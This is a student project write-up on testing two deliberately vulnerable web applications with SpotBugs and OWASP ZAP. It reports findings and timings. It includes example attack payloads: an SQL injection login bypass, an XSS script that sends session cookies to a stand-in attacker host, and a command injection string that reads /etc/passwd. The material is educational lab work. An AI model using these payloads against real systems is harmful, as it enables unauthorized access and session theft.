Vulnerabilities Identification and Exploitation

An extensive report on security testing practices for identifying, assessing, and exploiting vulnerabilities in web applications, detailed with real-world data and code examples.

Project Overview

This project was executed as part of a Master’s degree in Computer Science, focusing on the hands-on application of security testing techniques to uncover and exploit vulnerabilities in two intentionally vulnerable web applications: Bodgeit Store and Vulnerable App.

Tools and Technologies Employed

  • Eclipse: Used for setting up the web applications.
  • Spotbugs with Find-Sec-Bugs Plugin: Conducted static analysis to locate potential security issues.
  • OWASP ZAP 2.11.1: Applied for dynamic analysis, identifying vulnerabilities during application runtime.

Detailed Vulnerability Assessment

The project undertook a thorough examination of each application, yielding a comprehensive set of data on potential security flaws.

Bodgeit Store Vulnerabilities

  • Total Warnings from Static Analysis: 19 warnings, indicating possible weak cryptographic protocols.
  • Dynamic Analysis Findings: Identified 1050 possible attack vectors across 16 different classes of vulnerabilities.

Vulnerable App Vulnerabilities

  • Static Analysis Outcome: Produced 46 warnings with 20 categorized as “scary” due to their potential impact.
  • Dynamic Analysis Result: Revealed 36 possible attack vectors across 5 different vulnerability classes.

Exploitation Techniques and Code Examples

SQL Injection Exploitation

This attack exploited weak input validation to manipulate SQL queries and gain unauthorized access to the database.

# Example of SQL Injection Attack Vector
payload = "' OR '1'='1'; --"
response = requests.post('http://example.com/login', data={'username': payload})

This payload effectively bypasses authentication by always returning true, allowing an attacker to log in without a valid password.

Cross-Site Scripting (XSS) Exploitation

Demonstrated how an attacker could inject malicious JavaScript into web pages viewed by other users, stealing cookies or session tokens.

<script>
// Example of injecting a script to steal cookies
document.location='http://attacker.com/cookie_stealer.php?cookie='+document.cookie;
</script>

This script redirects the user to a malicious website while sending along the user’s session cookie, potentially leading to session hijacking.

Extended Vulnerability Analysis and Exploitation Details

Bodgeit Store Detailed Findings

Static Analysis Findings:

  • Total Vulnerabilities Identified: 19 with varying severity:
    • 11 “Scary”: Includes weak cryptographic protocols susceptible to breaches.
    • 7 “Troubling”: Potential vulnerabilities but with lower risk factors.
    • 1 “Of Concern”: Requires attention but not immediately exploitable.

Dynamic Analysis Results:

  • Total Attack Vectors Identified: 1050 potential vectors categorized into 16 classes:
    • High-Risk Alerts: 1 alert with 2 vectors found.
    • Medium-Risk Alerts: 649 vectors indicating significant exposure.
    • Low-Risk Alerts: 130 vectors that could lead to information disclosure.
    • Informational Alerts: 248 vectors providing insights but not direct threats.
# Example of exploiting a Cross-Site Scripting vulnerability
payload = "<script>alert('XSS');</script>"
response = requests.post('http://example.com/comment', data={'comment': payload})

Manual Analysis and Exploitation:

Successfully exploited 4 vulnerabilities including SQL injection and XSS using crafted payloads. Demonstrated the ability to manipulate session cookies and execute unauthorized commands.

Vulnerable App Comprehensive Review

Static Analysis Outcomes:

  • Total Warnings: 46 warnings with a high potential for exploitation:
    • 20 “Scary”: Critical vulnerabilities requiring immediate intervention.
    • 26 “Troubling”: Lesser severity but necessitates monitoring.

Dynamic Analysis Results:

  • Identified fewer vectors compared to Bodgeit Store but with impactful vulnerabilities:
    • Medium-Risk Alerts: 4 vectors potentially compromising system integrity.
    • Low-Risk and Informational Alerts: 32 vectors highlighting possible security misconfigurations.
# Command Injection example exploiting a system shell
command = "; cat /etc/passwd"
response = requests.get(f'http://example.com/process?input={command}')

Manual Analysis and Exploitation:

Detailed manual testing allowed for the exploitation of 6 unique vulnerabilities. Exploited vulnerabilities include command injection, path traversal, and unauthorized file access.

Security Metrics and Exploitation Summary

Bodgeit Store:

Static Analysis Time: 74 minutes to review results. Dynamic Analysis Time: 224 minutes to analyze and categorize results. Manual Exploitation Time: 14 minutes for effective vulnerability exploitation.

Vulnerable App:

Static Analysis Time: 162 minutes, highlighting the depth of vulnerabilities. Dynamic Analysis Time: 22 minutes, limited by the tool’s reach in the application. Manual Exploitation Time: 193 minutes, detailed exploitation of complex vulnerabilities.

Discussion on Results

The use of security testing tools like SpotBugs and OWASP ZAP proved essential in identifying and exploiting vulnerabilities within intentionally vulnerable applications. The project demonstrated the effectiveness of these tools in a controlled educational environment and highlighted the importance of comprehensive security testing in the development lifecycle.

  • Tool Effectiveness: SpotBugs was more effective in static analysis, especially for Vulnerable App, identifying numerous critical vulnerabilities. OWASP ZAP excelled in dynamic analysis for Bodgeit Store, uncovering a wide range of exploitable vulnerabilities.

  • Learning Outcome: The project significantly enhanced understanding of web application security, particularly in identifying, assessing, and mitigating risks. It also underscored the importance of integrating security testing early in the development process to detect and resolve vulnerabilities before deployment.

Conclusion

This project not only highlighted the critical importance of regular security assessments for web applications but also provided a hands-on approach to understanding and mitigating common security threats. The findings underscore the need for developers to adopt secure coding practices and for organizations to maintain robust security protocols.

For further insights and detailed findings, explore the project repository on GitHub.

Feel free to reach out for discussions on web application security or any related topics!